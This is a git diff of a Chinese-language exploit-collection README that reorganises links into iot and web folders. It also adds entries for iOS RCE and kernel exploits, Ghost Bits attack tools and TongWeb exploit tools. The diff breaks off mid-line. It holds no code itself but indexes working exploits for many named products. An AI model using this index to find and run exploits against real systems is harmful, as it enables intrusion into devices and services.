diff --git a/BlueKeep/requirements.txt b/BlueKeep/requirements.txt index 5be82196a..ef35cbd0a 100644 --- a/BlueKeep/requirements.txt +++ b/BlueKeep/requirements.txt @@ -1 +1 @@ -pyopenssl==19.0 \ No newline at end of file +pyopenssl==26.0.0 \ No newline at end of file diff --git a/README.md b/README.md index 3e30c4b09..cfd6de62a 100644 --- a/README.md +++ b/README.md @@ -18,10 +18,10 @@ ## IOT Device&Mobile Phone -- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md) -- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md) -- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md) -- [D-Link路由器RCE漏洞](./CVE-2019-16920-D-Link-rce.md) +- [天翼创维awifi路由器存在多处未授权访问漏洞](./iot/天翼创维awifi路由器存在多处未授权访问漏洞.md) +- [华为WS331a产品管理页面存在CSRF漏洞](./iot/华为WS331a产品管理页面存在CSRF漏洞.md) +- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./iot/CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md) +- [D-Link路由器RCE漏洞](./iot/CVE-2019-16920-D-Link-rce.md) - [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./CVE-2019-13051) - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb) 
@@ -30,20 +30,21 @@ - [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md) - [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件)](https://www.exploit-db.com/exploits/48158) - [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5权限提升](https://www.exploit-db.com/exploits/48154) -- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md) +- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./iot/CVE-2020-9374.md) - [CVE-2020-12753-LG 智能手机任意代码执行漏洞](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) - [CVE-2020-12695-UPnP 安全漏洞](https://github.com/yunuscadirci/CallStranger) - [79款 Netgear 路由器遭远程接管0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py) - [dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377](https://github.com/renatoalencar/dlink-dir610-exploits) - [wacker:一组脚本,可辅助对WPA3接入点执行在线词典攻击](https://github.com/blunderbuss-wctf/wacker) - [CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析](./books/CVE-2020-24581%20D-Link%20DSL-2888A%20远程命令执行漏洞分析.pdf)-[原地址](https://www.anquanke.com/post/id/229323) -- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md) +- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./iot/CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md) - [CNVD-2021-14544:Hikvision 海康威视流媒体管理服务器任意文件读取](https://github.com/Henry4E36/Hikvision) - [CNVD-2020-25078:D-link 敏感信息泄漏,可以直接获取账户密码查看监控](https://github.com/Henry4E36/D-link-information) - [ios-gamed-0day](https://github.com/illusionofchaos/ios-gamed-0day) - [ios-nehelper-wifi-info-0day](https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day) - [ios-nehelper-enum-apps-0day](https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day) - [iOS 15.0.1 
RCE PoC](https://github.com/jonathandata1/ios_15_rce) +- [DarkSword-RCE:Apple iOS 远程代码执行漏洞利用](https://github.com/htimesnine/DarkSword-RCE)|[darksword-kexploit:Apple iOS 内核漏洞利用](https://github.com/opa334/darksword-kexploit)|[DarkSword:Apple iOS 漏洞利用](https://github.com/ghh-jb/DarkSword) - [CVE-2021-36260:海康威视产品命令注入漏洞](https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html) - [CVE-2021-33044、CVE-2021-33045 大华摄像头POC](https://github.com/mcw0/DahuaConsole)|[相关分析](https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt)|[登录绕过chrome 插件](https://github.com/bp2008/DahuaLoginBypass) - [CVE-2021-36260:海康威视命令注入漏洞](https://github.com/rabbitsafe/CVE-2021-36260)|[又一个CVE-2021-36260利用脚本](https://github.com/Cuerz/CVE-2021-36260) @@ -59,7 +60,7 @@ - [IOT_vuln:IOT相关漏洞仓库](https://github.com/EPhaha/IOT_vuln) - [hikvision_CVE-2017-7921_auth_bypass_config_decryptor:解密受CVE-2017-7921影响的海康威视的配置文件](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) - [CVE-2022-20866:思科自适应安全设备软件和 Firepower 威胁防御软件 RSA 私钥泄漏检查](https://github.com/CiscoPSIRT/CVE-2022-20866) -- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md) +- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./iot/WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md) - [Buffer overflow in Xiongmai DVRs](https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/)|[备份](https://web.archive.org/web/20221129205148/https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/) - [CVE-2023-27350: PaperCut NG身份验证绕过导致的RCE](https://github.com/horizon3ai/CVE-2023-27350) - [ivms-8700-0day-poc: 海康威视iVMS-8700综合安防管理平台任意文件上传漏洞](https://github.com/spmonkey/ivms-8700-0day-poc) 
@@ -80,41 +81,48 @@ - [从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link Di-7200G 命令注入漏洞)](./books/从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link%20Di-7200G%20命令注入漏洞).html) - [2024 RWCTF群晖 BC500摄像头RCE--未授权_栈溢出](./books/2024%20RWCTF群晖%20BC500摄像头RCE--未授权_栈溢出.html) - [路由器dd手动提取固件---迅捷PoEAC路由一体机FR100P-AC固件提取](./books/路由器dd手动提取固件---迅捷PoEAC路由一体机FR100P-AC固件提取.html) +- [NX_Firmware:任天堂Switch各版本固件数据库](https://github.com/THZoria/NX_Firmware) +- [vphone-aio:一键运行已越狱并安装完整bootstrap的iOS虚拟手机(vphone)脚本](https://github.com/34306/vphone-aio) +- [AssppJailbroken:一款用于解密从 App Store 下载的最新 IPA 文件的工具,并支持在已越狱的 iOS 设备及 iPhone 模拟器上运行](https://github.com/lbr77/AssppJailbroken) +- [FirmWire:支持三星 Shannon 和 MediaTek 基带固件的全系统动态分析平台,可用于模糊测试、漏洞根因分析与调试](https://github.com/FirmWire/FirmWire) +- [Podroid:无需 root 即可在 Android 手机上运行 Linux 容器,基于 QEMU 启动 Alpine Linux 虚拟机并提供完整的 Podman 容器运行时](https://github.com/ExTV/Podroid) +- [PrismSpace:基于 Android 工作资料(managed profile)的应用双开管理器](https://github.com/yzddmr6/PrismSpace) +- [Tsec-Salon:腾讯安全沙龙历届活动材料](https://github.com/Yeti-791/Tsec-Salon)|[BLACKHAT_Asia2026: Black Hat Asia 2026 议题资料汇总](https://github.com/Mr-xn/BLACKHAT_Asia2026)|[Java Ghost Bits - Black Hat Asia 2026 演讲PDF(幽灵比特位:高位截断)](https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf)|[GBitsTools: Ghost Bits攻击工具(Python GUI/CLI)](https://github.com/shiyeshu/GBitsTools)|[GbitsGen: Ghost Bits字符生成工具](https://github.com/qi4L/GbitsGen)|[ghost-bits-lab: Ghost Bits交互式安全实验靶机(Java)](https://github.com/Xc1Ym/ghost-bits-lab) ## Web APP -- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md) -- [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md) -- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) -- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) -- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) -- [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md) -- [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md) -- [Cobub Razor 
0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md) -- [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md) -- [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) -- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) -- [DomainMod的XSS集合](DomainMod的XSS集合.md) -- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) -- [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md) -- [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md) -- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) -- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) +- [致远OA_A8_getshell_0day](./web/致远OA_A8_getshell_0day.md) +- [Couch through 2.0存在路径泄露漏洞 ](./web/Couch%20through%202.0存在路径泄露漏洞.md) +- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](./web/Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) +- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](./web/joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) +- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](./web/MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) +- [Z-Blog 1.5.1.1740存在XSS漏洞](./web/Z-Blog%201.5.1.1740存在XSS漏洞.md) +- [YzmCMS 3.6存在XSS漏洞](./web/YzmCMS%203.6存在XSS漏洞.md) +- [Cobub Razor 0.7.2越权增加管理员账户](./web/Cobub%20Razor%200.7.2越权增加管理员账户.md) +- [Cobub Razor 0.8.0存在SQL注入漏洞](./web/Cobub%20Razor%200.8.0存在SQL注入漏洞.md) +- [Cobub Razor 0.8.0存在物理路径泄露漏洞](./web/Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) +- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](./web/五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) +- [DomainMod的XSS集合](./web/DomainMod的XSS集合.md) +- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](./web/GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) +- [yii2-statemachine v2.x.x存在XSS漏洞](./web/yii2-statemachine%20v2.x.x存在XSS漏洞.md) +- [maccms_v10存在CSRF漏洞可增加任意账号](./web/maccms_v10存在CSRF漏洞可增加任意账号.md) +- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](./web/LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) +- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](./web/Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) - [Amazon Kindle Fire HD (3rd 
Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md) -- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) -- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) -- [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) -- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) -- [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) -- [MetInfoCMS 5.X版本GETSHELL漏洞合集](MetInfoCMS%205.X版本GETSHELL漏洞合集.md) +- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](./web/Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) +- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](./web/Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) +- [indexhibit cms v2.1.5 直接编辑php文件getshell](./web/indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) +- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](./web/S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) +- [S-CMS PHP v3.0存在SQL注入漏洞](./web/S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) +- [MetInfoCMS 5.X版本GETSHELL漏洞合集](./web/MetInfoCMS%205.X版本GETSHELL漏洞合集.md) - [MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf](./books/MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf) - [discuz ml RCE 漏洞检测工具](discuz-ml-rce/README.md) -- [thinkphp5框架缺陷导致远程代码执行](thinkphp5框架缺陷导致远程代码执行.md) -- [FineCMS_v5.0.8两处getshell](FineCMS_v5.0.8两处getshell.md) +- [thinkphp5框架缺陷导致远程代码执行](./web/thinkphp5框架缺陷导致远程代码执行.md) +- [FineCMS_v5.0.8两处getshell](./web/FineCMS_v5.0.8两处getshell.md) - [Struts2_045漏洞批量检测|搜索引擎采集扫描](Struts2_045-Poc) -- [thinkphp5命令执行](thinkphp5命令执行.md) -- [typecho反序列化漏洞](typecho反序列化漏洞.md) -- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md) +- [thinkphp5命令执行](./web/thinkphp5命令执行.md) +- [typecho反序列化漏洞](./web/typecho反序列化漏洞.md) +- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](./web/CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md) - [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC) - [CVE-2019-15107 Webmin RCE](./CVE-2019-15107) - [thinkphp5 rce漏洞检测工具](./tp5-getshell) 
@@ -127,43 +135,44 @@ - [生成Redis恶意模块so文件配合主从复制RCE达到命令执行](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[相关文章](https://www.freebuf.com/vuls/224235.html) - [RedisWriteFile-通过 `Redis` 主从写出无损文件,可用于 `Windows` 平台下写出无损的 `EXE`、`DLL`、 `LNK` 和 `Linux` 下的 `OS` 等二进制文件](https://github.com/r35tart/RedisWriteFile) - [WeblogicScanLot系列,Weblogic漏洞批量检测工具](./WeblogicScanLot) +- [TongWeb EJB 利用与插件工具](https://github.com/Axyanzzzz/TongWebEJBExploit) | [TongwebPlugin](https://github.com/Gary-yang1/TongwebPlugin) - [jboss_CVE-2017-12149](./jboss_CVE-2017-12149) - [Wordpress的拒绝服务(DoS)-CVE-2018-6389](./CVE-2018-6389) - [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) -- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md) -- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md) -- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md) -- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md) -- [泛微OA管理系统RCE漏洞利用脚本](./泛微OA管理系统RCE漏洞利用脚本.md) -- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) +- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./web/CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md) +- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./web/CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md) +- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./web/CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md) +- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./web/CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md) +- [泛微OA管理系统RCE漏洞利用脚本](./web/泛微OA管理系统RCE漏洞利用脚本.md) +- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./web/CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) - [zentao-getshell 禅道8.2 - 
9.2.1前台Getshell](./zentao-getshell) -- [泛微 e-cology OA 前台SQL注入漏洞](./泛微%20e-cology%20OA%20前台SQL注入漏洞.md) -- [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md) -- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) -- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md) -- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) -- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) +- [泛微 e-cology OA 前台SQL注入漏洞](./web/泛微%20e-cology%20OA%20前台SQL注入漏洞.md) +- [Joomla-3.4.6-RCE](./web/Joomla-3.4.6-RCE.md) +- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./web/Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) +- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./web/构建ASMX绕过限制WAF达到命令执行.md) +- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./web/CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) +- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) - [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043) -- [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md) -- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md) +- [ThinkCMF漏洞全集和](./web/ThinkCMF漏洞全集和.md) +- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./web/CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md) - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar) -- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md) -- [rConfig v3.9.2 RCE漏洞](./rConfig%20v3.9.2%20RCE漏洞.md) -- [apache_solr_rce](./solr_rce.md) -- [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md) +- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./web/freeFTP1.0.8-'PASS'远程缓冲区溢出.md) +- [rConfig v3.9.2 RCE漏洞](./web/rConfig%20v3.9.2%20RCE漏洞.md) +- [apache_solr_rce](./web/solr_rce.md) +- [CVE-2019-7580 
thinkcmf-5.0.190111后台任意文件写入导致的代码执行](./web/CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md) - [Apache Flink任意Jar包上传导致远程代码执行](https://github.com/LandGrey/flink-unauth-rce) - [Jwt_Tool - 用于验证、伪造、扫描和篡改 JWT(JSON Web 令牌)](https://github.com/ticarpi/jwt_tool) -- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md) +- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](./web/cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md) - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634) -- [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) +- [Apache Solr RCE via Velocity Template Injection](./web/Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) - [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107) - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) -- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf) -- [WDJACMS1.5.2模板注入漏洞](./WDJACMS1.5.2模板注入漏洞.md) +- [ZZCMS201910 SQL Injections](./web/ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf) +- 
[WDJACMS1.5.2模板注入漏洞](./web/WDJACMS1.5.2模板注入漏洞.md) - [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781) - [CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781) - [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/) 
@@ -185,28 +194,28 @@ - [YzmCMS 5.4 后台getshell](https://xz.aliyun.com/t/7231) - 关于Ghostcat(幽灵猫CVE-2020-1938漏洞):[CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)|[Java版本POC](https://github.com/0nise/CVE-2020-1938)|[Tomcat-Ajp协议文件读取漏洞](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/)|[又一个python版本CVE-2020-1938漏洞检测](https://github.com/xindongzhuaizhuai/CVE-2020-1938)|[CVE-2020-1938-漏洞复现环境及EXP](https://github.com/laolisafe/CVE-2020-1938) - [CVE-2020-8840:Jackson-databind远程命令执行漏洞(或影响fastjson)](https://github.com/jas502n/CVE-2020-8840) -- [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析(需要认证/或开启访客即可不需要登录)(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159) +- [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析(需要认证/或开启访客即可不需要登录)(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./web/CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159) - [CVE-2020-7246-PHP项目管理系统qdPM< 9.1 RCE](https://www.exploit-db.com/exploits/48146) - [CVE-2020-9547:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9547) - [CVE-2020-9548:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9548) - [Apache ActiveMQ 5.11.1目录遍历/ Shell上传](https://cxsecurity.com/issue/WLB-2020030033) - [CVE-2020-2555:WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555) - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947) -- 
[CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md) -- [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf) +- [CVE-2020-0554:phpMyAdmin后台SQL注入](./web/CVE-2020-0554:phpMyAdmin后台SQL注入.md) +- [泛微E-Mobile Ognl 表达式注入](./web/泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf) - [泛微10前台上传 getshell](https://github.com/west9b/Weaver/tree/7130bc856cf8b5cbc739a7934cdc01872f4107f3)|[Python 版本 getshell](https://github.com/gglvv/2022hvv-eoffice10-getshell) - [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py) - [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug) - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1)](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) - [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/) - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260) -- [通达OA前台任意用户伪造登录漏洞批量检测](./通达OA前台任意用户伪造登录漏洞批量检测.md) +- [通达OA前台任意用户伪造登录漏洞批量检测](./web/通达OA前台任意用户伪造登录漏洞批量检测.md) - [CVE-2020-11890 JoomlaRCE <3.9.17 远程命令执行漏洞(需要有效的账号密码)](https://github.com/HoangKien1020/CVE-2020-11890) - [CVE-2020-10238【JoomlaRCE <= 3.9.15 远程命令执行漏洞(需要有效的账号密码)】&CVE-2020-10239【JoomlaRCE 3.7.0 to 3.9.15 远程命令执行漏洞(需要有效的账号密码)】](https://github.com/HoangKien1020/CVE-2020-10238) - [CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)|[CVE-2020-2883-Weblogic coherence.jar RCE](https://github.com/Y4er/CVE-2020-2883)|[WebLogic-Shiro-shell-WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册filter内存shell](https://github.com/Y4er/WebLogic-Shiro-shell)|[shiro_rce_tool:可能是最好用的shiro利用工具](https://github.com/wyzxxz/shiro_rce_tool)|[ShiroExploit:ShiroExploit 是一款 Shiro 
